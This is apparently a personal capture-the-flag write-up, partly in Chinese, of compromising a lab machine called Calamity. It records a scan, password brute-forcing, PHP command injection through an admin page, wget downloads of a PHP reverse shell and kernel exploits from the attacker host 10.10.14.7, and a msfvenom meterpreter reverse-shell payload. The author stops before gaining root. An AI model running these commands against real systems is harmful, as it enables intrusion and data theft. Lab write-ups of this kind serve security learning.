Calamity(web rce)

1
2
3
4
5
6
7
8
9
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:46:31:9c:b5:71:c5:96:91:7d:e4:63:16:f9:59:a2 (RSA)
|   256 10:c4:09:b9:48:f1:8c:45:26:ca:f6:e1:c2:dc:36:b9 (ECDSA)
|_  256 a8:bf:dd:c0:71:36:a8:2a:1b:ea:3f:ef:66:99:39:75 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Brotherhood Software
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

web scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
gobuster -u http://10.10.10.27 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/uploads (Status: 301)

---
curl -X OPTIONS http://10.10.10.27 -I
HTTP/1.1 200 OK
Date: Wed, 20 Mar 2019 02:36:59 GMT
Server: Apache/2.4.18 (Ubuntu)
Allow: OPTIONS,GET,HEAD,POST
Content-Length: 0
Content-Type: text/html
---
curl -X PUT http://10.10.10.27/uploads/1.html -d "<?php system($_GET['cmd']) ?>" <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /uploads/1.html.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.10.27 Port 80</address>
</body></html>
---
nikto -h 10.10.10.27 


+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...

find exp

searchsploit EasyNews

http://10.10.10.27/admin.php

find password

burp + sqlmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /admin.php HTTP/1.1

Host: 10.10.10.27

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://10.10.10.27/admin.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 15

Connection: close

Upgrade-Insecure-Requests: 1

user=00&pass=00

sqlmap -r 1.req

sqlmap -r 1.req –risk 3 –level 5

hydra

1
2
cd /usr/share/seclists/Usernames
hydra -L top-usernames-shortlist.txt -P /usr/share/wordlists/500-worst-passwords.txt -f 10.10.10.27  http-post-form "/admin.php:user=^USER^&pass=^PASS^:HERE"

wapiti -u http://10.10.10.27/admin.php

not found any vul

curl -X POST http://10.10.10.27/admin.php -d “<?php system($_GET[‘cmd’]) ?>”

1
2
3
4
5
6
7
8
9
<html><body>

<form method="post">
Password: <input type="text" name="user"><br>
Username: <input type="password" name="pass">
  <input type="submit" value="Log in to the powerful administrator page">
										<!-- password is:skoupidotenekes-->
</form> 
</body></html>

准备尝试post能否上传一句话,然后意外发现,源代码中藏着密码。

3 发现图片中用户名和密码颠倒了,burp抓包…em,应该是开发错误。

1
2
3
4
cd /usr/share/seclists/Usernames
hydra -L top-usernames-shortlist.txt -p skoupidotenekes -f 10.10.10.27  http-post-form "/admin.php:user=^USER^&pass=^PASS^:HERE"

hydra -L cirt-default-usernames.txt -p skoupidotenekes -f 10.10.10.27  http-post-form "/admin.php:user=^USER^&pass=^PASS^:HERE"

4

  1. http://10.10.10.27/admin.php?html=
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
html=<?php system(ls) ?> admin.php bg.png index.html leet.png uploads 
html=<?php system(whoami) ?>   www-data 
html=<?php system("cat /etc/passwd") ?>
html=<?php system("cat /home/xalvas/user.txt") ?>

/bin/nc /bin/nc.openbsd     nc不支持-e,于是上传php shell。
ls -al /tmp          tmp目录可写不可读
d-wx-wx-wx  10 root root  4096 Mar 19 23:39 tmp

pwd /var/www/html

/usr/bin/wget http://10.10.14.7/php-reverse-shell.php -P /tmp

html=<?php system("ls -al /tmp/shell.php") ?>
chmod a+x /tmp/php-reverse-shell.php
html=<?php system("php /tmp/php-reverse-shell.php") ?>
获得一个shell
  1. info

Linux calamity 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:15:00 UTC 2017 i686 i686 i686 GNU/Linux

whereis gcc

gcc: /usr/bin/gcc /usr/lib/gcc /usr/share/man/man1/gcc.1.gz

准备上传msf类型exp。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=6678 -f elf -o payload.elf

本地执行:
handler -H 10.10.14.7 -P 6678 -p linux/x86/meterpreter/reverse_tcp
python -m SimpleHTTPServer

远程shell执行:
wget http://10.10.14.7:8000/payload.elf -P /tmp
chmod a+x /tmp/payload.elf
./tmp/payload.elf

[*] Meterpreter session 5 opened (127.0.0.1 -> 127.0.0.1) at 2019-03-20 12:11:48 +0800

成功连接,但是一旦连接就会断开
  1. searchsploit linux 4.4.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
wget http://10.10.14.7:8000/43418.c -P /tmp
chmod a+x /tmp/43418.c
gcc 43418.c -o pwn
编译失败

wget http://10.10.14.7:8000/pwn -P /tmp
chmod a+x /tmp/pwn
./pwn
二进制格式失败,kali本地编译运行为64位。

wget http://10.10.14.7:8000/44298.c -P /tmp
gcc 44298.c -o pwn
44298.c
编译失败
  1. ps -ef grep root
1
2
root      1049     1  0 Mar17 ?        00:00:01 /usr/bin/lxcfs /var/lib/lxcfs/
搜索lxcfs,判断主机可能是一个容器。
  1. cat /home/xalvas/dontforget.txt
1
2
peda keeps commads history in the working dir...you should make a dir in /tmp and work from there
keep in mind that tmp is not listable,so other users cannot see your files and folders (if you dont use extrmely simple names)
  1. 找到一个可写目录/var/tmp,将LinEnum.sh上传到目标机
1
2
3
4
5
6
7
8
9
10
wget http://10.10.14.7:8000/LinEnum.sh
wget http://10.10.14.7:8000/linux-exploit-suggester.sh
chmod a+x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

wget http://10.10.14.7:8000/40839
gcc -pthread 40839 -o dirty -lcrypt
/usr/bin/ld:40839: file format not recognized; treating as linker script
/usr/bin/ld:40839:2: syntax error
collect2: error: ld returned 1 exit status
1
2
3
4
5
6
7
8
nc -lnvp 7788 < recov.wav
Listening on [0.0.0.0] (family 0, port 7788)
Killed

python -m SimpleHTTPServer
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Killed

提权需要绕过进程保护,绕过许多内存保护机制,利用二进制文件。手写exp。

看了wp也看不懂,溜了溜了。